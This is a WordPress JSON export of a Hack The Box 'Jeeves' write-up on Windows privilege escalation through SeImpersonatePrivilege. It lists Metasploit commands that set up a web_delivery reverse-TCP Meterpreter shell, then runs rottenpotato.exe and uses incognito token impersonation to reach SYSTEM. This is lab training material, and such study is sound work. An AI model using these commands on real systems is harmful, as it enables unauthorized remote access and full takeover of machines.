{"id":89,"date":"2020-05-08T18:37:05","date_gmt":"2020-05-08T18:37:05","guid":{"rendered":"https:\/\/shreyapohekar.com\/blogs\/?p=89"},"modified":"2020-05-22T19:07:30","modified_gmt":"2020-05-22T19:07:30","slug":"abusing-seimpersonateprivilege-on-users-to-become-system","status":"publish","type":"post","link":"https:\/\/shreyapohekar.com\/blogs\/abusing-seimpersonateprivilege-on-users-to-become-system\/","title":{"rendered":"Abusing SeImpersonatePrivilege on users to become SYSTEM"},"content":{"rendered":"\n

Hello Everyone! This is Shreya Pohekar. This is a follow-up blog from jeeves from hackthebox. Jeeves is a medium windows box. The writeup can be found out here. <\/p>\n\n\n\n

This blog post depicts yet another way to priv esc to Administrator. The pre-requisite is to have a user shell.
When I ran a whoami \/priv<\/b> , It listed all the privileges the user has. And SeImpersonatePrivilege<\/b> being enabled was something that caught my eye<\/p>\n\n\n\n

\"\"<\/figure>\n\n\n\n

Since privilege escalation via this method was unintended way, I am covering this exploit as an independent blog where we’ll be learning what exactly is this privilege and how it can be exploited.<\/p>\n\n\n\n

So lets get started.<\/p>\n\n\n\n

As the screenshot suggests, when the SeImpersonatePrivilege is enabled for any normal user, he is able to Impersonate a client having higher privileges after he successfully authenticates. In a nutshell, we as a normal user can escalate our privileges to nt authority. Sounds interesting right?? <\/p>\n\n\n\n

So how do the Privilege Escalation works?<\/h2>\n\n\n\n

The privilege escaltion with SeImpersonateprivilege is broken down in 3 steps as follows:<\/p>\n\n\n\n

  1. Trick the SYSTEM account to authenticate via NTLM to an endpoint that is controlled by us.<\/li>
  2. intercept this authentication attempt and locally negotiate security token for SYSTEM account.<\/li>
  3. Impersonate the tokens that are just been negotiated via MITM. For token impersonation to work, SeImpersonatePrivilege is a must.<\/li><\/ol>\n\n\n\n

    To read about the internals of this exploit, do read the blog by foxglovesecurity<\/a> <\/p>\n\n\n\n

    Abusing the privilege with metasploit<\/h2>\n\n\n\n

    Working with metasploit is pretty simple as it comes handy with builtin methods that saves us from a lot of repetitive task.<\/p>\n\n\n\n

    If you have a basic user shell, switch to meterpreter shell with the following commands:<\/p>\n\n\n\n

    1. msfconsole<\/li>
    2. use exploit\/multi\/script\/web_delivery<\/li>
    3. set target 2<\/li>
    4. set payload windows\/meterpreter\/reverse_tcp<\/li>
    5. set lhost tun0<\/li>
    6. set srvhost <your ip add><\/li>
    7. exploit<\/li><\/ol>\n\n\n\n

      <\/p>\n\n\n\n

      Running exploit generates a powershell script that has to be copied to the already spawned shell. Once the powershell payload gets executed on the previously obtained shell, you get a meterpreter.<\/p>\n\n\n\n

      Now we’ll run load incognito. This tool is used to escalate privileges inside Active Directory environments. With incognito, we are able to impersonate authenticated tokens on the target windows machine.<\/p>\n\n\n\n

      <\/p>\n\n\n\n

      The tokens can be listed with the command list_tokens -u (for users) and list_tokens -g ( for groups). But the commands wont list any impersonation token because we havent yet tricked the Administration to authenticate.<\/p>\n\n\n\n

      Let’s generate tokens<\/h2>\n\n\n\n

      The exploit of the scenerio can be achieved with an exe, rottenpotato.exe that does the actual working of tricking the Administrator via NTLM. The file can be downloaded from here<\/a>.\nNow we have to upload the exe to the meterpreter shell. It can be easily done via upload<\/b> command. Then execute the exe with execute -cH -f potato.exe<\/b><\/p>\n\n\n\n

      <\/p>\n\n\n\n

      Once the exe gets executed, we can again list the tokens, if generated in the process.<\/p>\n\n\n\n

      <\/p>\n\n\n\n

      Volla! We have got impersonation tokens now. And to our interest, BUILTIN\\Administrators<\/b> has a Impersonation token available. So let’s impersonate it. <\/p>\n\n\n\n

      With impersonate_token<\/b> module, the account of any user can be mimed <\/p>\n\n\n\n

      <\/p>\n\n\n\n

      After impersonation, we get the shell as nt authority\\system<\/b>.<\/p>\n\n\n\n

      That’s all for this blog post. Hope you enjoyed reading.
      \nUntil then, Happy Hacking!!<\/p>\n","protected":false},"excerpt":{"rendered":"

      Hello Everyone! This is Shreya Pohekar. This is a follow-up blog from jeeves from hackthebox. Jeeves is a medium windows box. The writeup can be found out here. This blog post depicts yet another way to priv esc to Administrator. The pre-requisite is to have a user shell.When I ran a whoami \/priv , It […]<\/p>\n","protected":false},"author":1,"featured_media":183,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"ocean_post_layout":"","ocean_both_sidebars_style":"","ocean_both_sidebars_content_width":0,"ocean_both_sidebars_sidebars_width":0,"ocean_sidebar":"","ocean_second_sidebar":"","ocean_disable_margins":"enable","ocean_add_body_class":"","ocean_shortcode_before_top_bar":"","ocean_shortcode_after_top_bar":"","ocean_shortcode_before_header":"","ocean_shortcode_after_header":"","ocean_has_shortcode":"","ocean_shortcode_after_title":"","ocean_shortcode_before_footer_widgets":"","ocean_shortcode_after_footer_widgets":"","ocean_shortcode_before_footer_bottom":"","ocean_shortcode_after_footer_bottom":"","ocean_display_top_bar":"default","ocean_display_header":"default","ocean_header_style":"","ocean_center_header_left_menu":"","ocean_custom_header_template":"","ocean_custom_logo":0,"ocean_custom_retina_logo":0,"ocean_custom_logo_max_width":0,"ocean_custom_logo_tablet_max_width":0,"ocean_custom_logo_mobile_max_width":0,"ocean_custom_logo_max_height":0,"ocean_custom_logo_tablet_max_height":0,"ocean_custom_logo_mobile_max_height":0,"ocean_header_custom_menu":"","ocean_menu_typo_font_family":"","ocean_menu_typo_font_subset":"","ocean_menu_typo_font_size":0,"ocean_menu_typo_font_size_tablet":0,"ocean_menu_typo_font_size_mobile":0,"ocean_menu_typo_font_size_unit":"px","ocean_menu_typo_font_weight":"","ocean_menu_typo_font_weight_tablet":"","ocean_menu_typo_font_weight_mobile":"","ocean_menu_typo_transform":"","ocean_menu_typo_transform_tablet":"","ocean_menu_typo_transform_mobile":"","ocean_menu_typo_line_height":0,"ocean_menu_typo_line_height_tablet":0,"ocean_menu_typo_line_height_mobile":0,"ocean_menu_typo_line_height_unit":"","ocean_menu_typo_spacing":0,"ocean_menu_typo_spacing_tablet":0,"ocean_menu_typo_spacing_mobile":0,"ocean_menu_typo_spacing_unit":"","ocean_menu_link_color":"","ocean_menu_link_color_hover":"","ocean_menu_link_color_active":"","ocean_menu_link_background":"","ocean_menu_link_hover_background":"","ocean_menu_link_active_background":"","ocean_menu_social_links_bg":"","ocean_menu_social_hover_links_bg":"","ocean_menu_social_links_color":"","ocean_menu_social_hover_links_color":"","ocean_disable_title":"default","ocean_disable_heading":"default","ocean_post_title":"","ocean_post_subheading":"","ocean_post_title_style":"","ocean_post_title_background_color":"","ocean_post_title_background":0,"ocean_post_title_bg_image_position":"","ocean_post_title_bg_image_attachment":"","ocean_post_title_bg_image_repeat":"","ocean_post_title_bg_image_size":"","ocean_post_title_height":0,"ocean_post_title_bg_overlay":0.5,"ocean_post_title_bg_overlay_color":"","ocean_disable_breadcrumbs":"default","ocean_breadcrumbs_color":"","ocean_breadcrumbs_separator_color":"","ocean_breadcrumbs_links_color":"","ocean_breadcrumbs_links_hover_color":"","ocean_display_footer_widgets":"default","ocean_display_footer_bottom":"default","ocean_custom_footer_template":"","ocean_post_oembed":"","ocean_post_self_hosted_media":"","ocean_post_video_embed":"","ocean_link_format":"","ocean_link_format_target":"self","ocean_quote_format":"","ocean_quote_format_link":"post","ocean_gallery_link_images":"on","ocean_gallery_id":[],"footnotes":""},"categories":[19,2],"tags":[26,54,65,59,46,64,61,60,58,62,63,56,57],"class_list":["post-89","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-hackthebox","category-information-security","tag-hackthebox","tag-htb","tag-impersonate_token","tag-incognito","tag-jeeves","tag-list_token-g","tag-priv-esc","tag-privilege-escaltion","tag-redteam","tag-rotten-potato","tag-rottenpotato-exe","tag-seimpersonateprivilege","tag-windows","entry","has-media"],"aioseo_notices":[],"_links":{"self":[{"href":"https:\/\/shreyapohekar.com\/blogs\/wp-json\/wp\/v2\/posts\/89"}],"collection":[{"href":"https:\/\/shreyapohekar.com\/blogs\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/shreyapohekar.com\/blogs\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/shreyapohekar.com\/blogs\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/shreyapohekar.com\/blogs\/wp-json\/wp\/v2\/comments?post=89"}],"version-history":[{"count":8,"href":"https:\/\/shreyapohekar.com\/blogs\/wp-json\/wp\/v2\/posts\/89\/revisions"}],"predecessor-version":[{"id":99,"href":"https:\/\/shreyapohekar.com\/blogs\/wp-json\/wp\/v2\/posts\/89\/revisions\/99"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/shreyapohekar.com\/blogs\/wp-json\/wp\/v2\/media\/183"}],"wp:attachment":[{"href":"https:\/\/shreyapohekar.com\/blogs\/wp-json\/wp\/v2\/media?parent=89"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/shreyapohekar.com\/blogs\/wp-json\/wp\/v2\/categories?post=89"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/shreyapohekar.com\/blogs\/wp-json\/wp\/v2\/tags?post=89"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}